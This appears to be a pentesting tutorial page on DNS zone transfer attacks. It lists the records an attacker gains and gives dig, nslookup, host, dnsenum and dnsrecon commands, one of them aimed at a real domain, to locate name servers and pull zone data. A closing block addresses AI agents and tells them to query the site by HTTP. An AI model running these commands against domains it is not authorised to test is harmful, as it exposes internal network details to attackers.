DNS zone transfer is the transfer of a DNS database to another server. This transfer can become a serious vulnerability, usually due to a misconfigured ruleset. It is a critical risk in enterprise environments, especially because it expands the attack surface.
## Security Issue:
From this attack an attacker can heave,,
* IP addresses of internal hosts
* Hostnames and corresponding IP addresses
* Mail server records (MX records)
* DNS server records (NS records)
* Other sensitive DNS records
## Perform a DNS Zone Transfer Attack:
#### F**ind the DNS Server:**
nslookup -type=NS targetdomain.com
dig NS targetdomain.com +short ## use any of these cmd.
host -t ns target.com
#### Exploit **Zone Transfer:**
```bash
dig @ns1.targetdomain.com targetdomain.com AXFR
nslookup -type=AXFR targetdomain.com ns1.targetdomain.com
host -l targer.com ns1.dnserver.com ## use any of these cmd.
dnsenum taget.com
dnsrecon -d medium.com -t axfr
```
## Zone Transfer API:
```bash
curl https://api.hackertarget.com/zonetransfer/?q=example.com
```
{% hint style="info" %}
for demostration purpose.
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://shahidulandshamim.gitbook.io/web-application/exploitation/dns-zone-transfer.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.